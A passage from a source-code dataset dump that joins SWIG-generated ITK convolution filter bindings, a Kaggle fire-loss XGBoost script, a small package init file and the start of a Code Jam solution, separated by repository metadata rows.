itkConvolutionImageFilterBaseIUC3IUC3.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetKernelImage, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetKernelImage, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetNormalize, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetNormalize, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_NormalizeOn, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_NormalizeOff, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIUC3IUC3)
itkConvolutionImageFilterBaseIUC3IUC3_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_swigregister
itkConvolutionImageFilterBaseIUC3IUC3_swigregister(itkConvolutionImageFilterBaseIUC3IUC3)
def itkConvolutionImageFilterBaseIUC3IUC3_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUC3IUC3 *":
"""itkConvolutionImageFilterBaseIUC3IUC3_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUC3IUC3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUC3IUC3_cast(obj)
class itkConvolutionImageFilterBaseIUS2IUS2(itkImageToImageFilterAPython.itkImageToImageFilterIUS2IUS2):
"""Proxy of C++ itkConvolutionImageFilterBaseIUS2IUS2 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIUS2') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseIUS2IUS2 self, itkImageBoundaryConditionIUS2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIUS2 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseIUS2IUS2 self) -> itkImageBoundaryConditionIUS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageUS2') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseIUS2IUS2 self, itkImageUS2 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageUS2 const *":
"""GetKernelImage(itkConvolutionImageFilterBaseIUS2IUS2 self) -> itkImageUS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseIUS2IUS2 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseIUS2IUS2 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseIUS2IUS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseIUS2IUS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIUS2IUS2::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseIUS2IUS2 self, itkConvolutionImageFilterBaseIUS2IUS2::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIUS2IUS2::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseIUS2IUS2 self) -> itkConvolutionImageFilterBaseIUS2IUS2::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIUS2IUS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIUS2IUS2 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIUS2IUS2
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUS2IUS2 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUS2IUS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseIUS2IUS2
Create a new object of the class itkConvolutionImageFilterBaseIUS2IUS2 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseIUS2IUS2.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseIUS2IUS2.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseIUS2IUS2.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseIUS2IUS2.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetKernelImage, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetKernelImage, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetNormalize, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetNormalize, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_NormalizeOn, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_NormalizeOff, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIUS2IUS2)
itkConvolutionImageFilterBaseIUS2IUS2_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_swigregister
itkConvolutionImageFilterBaseIUS2IUS2_swigregister(itkConvolutionImageFilterBaseIUS2IUS2)
def itkConvolutionImageFilterBaseIUS2IUS2_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUS2IUS2 *":
"""itkConvolutionImageFilterBaseIUS2IUS2_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUS2IUS2"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS2IUS2_cast(obj)
class itkConvolutionImageFilterBaseIUS3IUS3(itkImageToImageFilterAPython.itkImageToImageFilterIUS3IUS3):
"""Proxy of C++ itkConvolutionImageFilterBaseIUS3IUS3 class."""
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
def SetBoundaryCondition(self, _arg: 'itkImageBoundaryConditionIUS3') -> "void":
"""SetBoundaryCondition(itkConvolutionImageFilterBaseIUS3IUS3 self, itkImageBoundaryConditionIUS3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetBoundaryCondition(self, _arg)
def GetBoundaryCondition(self) -> "itkImageBoundaryConditionIUS3 *":
"""GetBoundaryCondition(itkConvolutionImageFilterBaseIUS3IUS3 self) -> itkImageBoundaryConditionIUS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetBoundaryCondition(self)
def SetKernelImage(self, _arg: 'itkImageUS3') -> "void":
"""SetKernelImage(itkConvolutionImageFilterBaseIUS3IUS3 self, itkImageUS3 _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetKernelImage(self, _arg)
def GetKernelImage(self) -> "itkImageUS3 const *":
"""GetKernelImage(itkConvolutionImageFilterBaseIUS3IUS3 self) -> itkImageUS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseIUS3IUS3 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseIUS3IUS3 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseIUS3IUS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseIUS3IUS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIUS3IUS3::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseIUS3IUS3 self, itkConvolutionImageFilterBaseIUS3IUS3::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIUS3IUS3::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseIUS3IUS3 self) -> itkConvolutionImageFilterBaseIUS3IUS3::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIUS3IUS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIUS3IUS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIUS3IUS3
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUS3IUS3 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUS3IUS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseIUS3IUS3
Create a new object of the class itkConvolutionImageFilterBaseIUS3IUS3 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseIUS3IUS3.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseIUS3IUS3.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseIUS3IUS3.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseIUS3IUS3.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetKernelImage, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetKernelImage, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetNormalize, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetNormalize, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_NormalizeOn, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_NormalizeOff, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_swigregister
itkConvolutionImageFilterBaseIUS3IUS3_swigregister(itkConvolutionImageFilterBaseIUS3IUS3)
def itkConvolutionImageFilterBaseIUS3IUS3_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUS3IUS3 *":
"""itkConvolutionImageFilterBaseIUS3IUS3_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUS3IUS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_cast(obj)
def convolution_image_filter_base(*args, **kwargs):
"""Procedural interface for ConvolutionImageFilterBase"""
import itk
instance = itk.ConvolutionImageFilterBase.New(*args, **kwargs)
return instance.__internal_call__()
def convolution_image_filter_base_init_docstring():
import itk
import itkTemplate
if isinstance(itk.ConvolutionImageFilterBase, itkTemplate.itkTemplate):
convolution_image_filter_base.__doc__ = itk.ConvolutionImageFilterBase.values()[0].__doc__
else:
convolution_image_filter_base.__doc__ = itk.ConvolutionImageFilterBase.__doc__
| [
"274065539@qq.com"
] | 274065539@qq.com |
f6b212a659c9e278260eae7b8179462cedbaae43 | b146e577c9661a672ae8bc147ad38760f31619c7 | /fire-xgb.py | 88366b836bf084ed3c5ad9bf74117d2a35675676 | [] | no_license | xuerchen/kaggle-peril-fire-loss-18th-solution | eaa99701a07f1897c455e7d81079a23481025983 | 358a1aa27a390200eea66e7d45f13e35de354918 | refs/heads/master | 2020-12-24T16:59:23.159925 | 2014-09-16T03:36:57 | 2014-09-16T03:36:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,700 | py | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
#%matplotlib inline
import numpy as np
import pandas as pd
from sklearn.linear_model import Lars,Ridge, Lasso, SGDClassifier,SGDRegressor,LogisticRegression,BayesianRidge
from sklearn.ensemble import RandomForestRegressor,GradientBoostingRegressor
from sklearn.preprocessing import scale
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
# <codecell>
import inspect
import os
import sys
code_path = os.path.join(
os.path.split(inspect.getfile(inspect.currentframe()))[0], "../../kaggle-fire/python")
sys.path.append(code_path)
import xgboost as xgb
# <codecell>
# <codecell>
def weighted_gini(act,pred,weight):
df = pd.DataFrame({"act":act,"pred":pred,"weight":weight})
df = df.sort('pred',ascending=False)
df["random"] = (df.weight / df.weight.sum()).cumsum()
total_pos = (df.act * df.weight).sum()
df["cum_pos_found"] = (df.act * df.weight).cumsum()
df["lorentz"] = df.cum_pos_found / total_pos
n = df.shape[0]
#df["gini"] = (df.lorentz - df.random) * df.weight
#return df.gini.sum()
gini = sum(df.lorentz[1:].values * (df.random[:-1])) - sum(df.lorentz[:-1].values * (df.random[1:]))
return gini
def normalized_weighted_gini(act,pred,weight):
return weighted_gini(act,pred,weight) / weighted_gini(act,act,weight)
def xgb_train_predict(data,label,test):
xgmat = xgb.DMatrix( data, label=label,missing=-999)
test_size = test.shape[0]
param = {}
param['objective'] = 'binary:logitraw'
weight = data * float(test_size) / len(label)
sum_wpos = sum( weight[i] for i in range(len(label)) if label[i] != 0 )
sum_wneg = sum( weight[i] for i in range(len(label)) if label[i] == 0 )
# param['scale_pos_weight'] = sum_wneg/sum_wpos
# param['booster_type']=1
param['bst:eta'] = 0.2
param['bst:max_depth'] = 2
param['eval_metric'] = 'auc'
param['silent'] = 1
param['nthread'] = 16
plst = list(param.items())#+[('eval_metric', 'ams@0.15')]
watchlist = [ (xgmat,'train') ]
num_round = 55 # 48 is good
# print ('loading data end, start to boost trees')
bst = xgb.train( plst, xgmat, num_round, watchlist );
# save out model
#bst.save_model('higgs.model')
#modelfile = 'higgs.model'
xgmat = xgb.DMatrix(test,missing=-999)
#bst = xgb.Booster({'nthread':16})
#bst.load_model( modelfile )
ypred = bst.predict( xgmat )
return ypred
# good: 0.2,2,40 -> 0.32
# <codecell>
di='../../data/'
print 'start reading data'
train = pd.read_csv(di+'train.csv')
# <markdowncell>
# # clean data
# <codecell>
vvar=[]
for i in range(1,10):
vvar.append('var'+str(i))
# get categorical feature
vv=train[vvar]
# <codecell>
allv={}
rc=[]
for i in range(1,10):
col='var'+str(i)
allv[col]= np.unique(vv[col])
for j in allv[col]:
xx=(vv[col][vv[col]==j].shape[0])*1.0/(vv.shape[0])
# only keep feature that has less than 50% Z
if xx<0.1 and j=='Z':
print col,'percentage of Z',xx
rc.append(col)
# <codecell>
vr=vv[rc] # just keep var 4,7,8,9
# <codecell>
# <codecell>
from sklearn import feature_extraction
def one_hot_dataframe(data, cols, replace=False):
vec = feature_extraction.DictVectorizer()
mkdict = lambda row: dict((col, row[col]) for col in cols)
#vecData = pd.DataFrame(vec.fit_transform(data[cols].to_dict(outtype='records')).toarray())
vecData = pd.DataFrame(vec.fit_transform(data[cols].apply(mkdict, axis=1)).toarray())
vecData.columns = vec.get_feature_names()
vecData.index = data.index
if replace:
data = data.drop(cols, axis=1)
data = data.join(vecData)
return (data, vecData)
# <codecell>
# fast one-step encoder
vr, vr_n = one_hot_dataframe(vr,rc, replace=True)
# <codecell>
weather=[]
for i in range(1,237):
weather.append('weatherVar'+str(i))
wvar=np.array(train[weather])
for i,c in enumerate(wvar.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
wvar[:,i]=c
# <codecell>
geo=[]
for i in range(1,38):
geo.append('geodemVar'+str(i))
gvar=np.array(train[geo])
for i,c in enumerate(gvar.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
gvar[:,i]=c
# <codecell>
# get var 10 ~ var 17 and crimevar
var=[]
for i in range(8):
var.append('var'+str(i+10))
crime=[]
for i in range(9):
crime.append('crimeVar'+str(i+1))
t_var=np.array(train[var])
for i,c in enumerate(t_var.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
t_var[:,i]=c
tc_var=np.array(train[crime])
for i,c in enumerate(tc_var.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
tc_var[:,i]=c
# <codecell>
#Xtrain = np.concatenate([t_var[:,[0]+range(2,8)],vr,wvar[:,102:103],wvar[:,152:153],gvar[:,30:32]], axis = 1)
#Xtrain = np.concatenate([t_var[:,[0]+range(2,8)],vr,wvar[:,102:103],wvar[:,152:153],gvar[:,30:32]], axis = 1) # good sub-xgb-wg
Xtrain = np.concatenate([t_var[:,[0]+range(2,8)],vr,wvar[:,[102,152]],gvar[:,[30,31]]], axis = 1)
#Xtrain = np.concatenate([t_var[:,[0]+range(2,8)],vr], axis = 1)
Wtrain=t_var[:,1]
# <codecell>
Xtrain=np.hstack((Xtrain,np.matrix(Wtrain).T))
ytrain=train['target']
test = pd.read_csv(di+'test.csv')
sample = pd.read_csv(di+'sampleSubmission.csv')
ts_var=np.array(test[var])
for i,c in enumerate(ts_var.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
ts_var[:,i]=c
tcs_var=np.array(test[crime])
for i,c in enumerate(tcs_var.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
tcs_var[:,i]=c
wsvar=np.array(test[weather])
for i,c in enumerate(wsvar.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
wsvar[:,i]=c
gsvar=np.array(test[geo])
for i,c in enumerate(gsvar.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
gsvar[:,i]=c
vt=test[rc]
vt, vt_n = one_hot_dataframe(vt,rc, replace=True)
#Xtest = np.concatenate([ts_var[:,[0]+range(2,8)],vt,wsvar[:,102:103],wsvar[:,152:153],gsvar[:,30:32],gsvar[:,0:1]], axis = 1)
Xtest = np.concatenate([ts_var[:,[0]+range(2,8)],vt,wsvar[:,[102,152]],gsvar[:,[30,31]]], axis = 1)
#the setting above is for submission-sk-xgb-wg
#Xtest = np.concatenate([ts_var[:,[0]+range(2,8)],vt,tcs_var[:,-2:-1],wsvar[:,102:103],wsvar[:,152:153],wsvar[:,91:92],wsvar[:,166:167],gsvar[:,30:32],gsvar[:,0:1]], axis = 1)
#Xtest = np.concatenate([ts_var[:,[0]+range(2,8)],vt,wsvar[:,102:103],wsvar[:,152:153]], axis = 1)
Wtest=ts_var[:,1]
#Xtest=scale(Xtest)
Xtest=np.hstack((Xtest,np.matrix(Wtest).T))
yp=xgb_train_predict(Xtrain[:,:-1],np.array(ytrain),Xtest[:,:-1])
sample['target'] = yp
print 'write back'
#sample.to_csv('submission-xgb-wg4-28-log-rounds140.csv', index = False)
sample.to_csv('submission-test.csv', index = False)
| [
"xuer.chen.human@gmail.com"
] | xuer.chen.human@gmail.com |
f53ad4cb5c53619890ba0d307211da71601ebe34 | 9caaaa8117db574a0395de8dc1720772b03b8ac5 | /ghost/formats/__init__.py | 05321f958174bc285cc52ecd909db084098168de | [
"MIT"
] | permissive | nelpy/ghost | 4a71cb105926ffe1564e36df01b4dc51c1dd9322 | d2dc56425a25ff6a987c9f25b3630e58fdf1a285 | refs/heads/master | 2021-06-15T14:38:26.900854 | 2021-04-05T14:23:31 | 2021-04-05T14:23:31 | 179,384,831 | 9 | 1 | MIT | 2021-02-02T16:41:28 | 2019-04-03T23:19:58 | Python | UTF-8 | Python | false | false | 105 | py | """Tools to go from one format to another"""
from .preprocessing import *
from .postprocessing import *
| [
"jchutrue@gmail.com"
] | jchutrue@gmail.com |
ad98b95a0f4d708bfa986b7026a5286b48cfdedd | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_1483488_0/Python/oneup/probC.py | 82474b8652c0745bee94db5539394b83c464a142 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 778 | py | import sys
import math
def num_digits(x):
return math.ceil(math.log(x+1) / math.log(10))
def rotate(x,d):
#print >>sys.stderr,x,d
mod = 10**(d-1)
return (x%mod)*10 + (x/mod)
def test(A,B):
total = 0
d = 0
x = A
while x:
d += 1
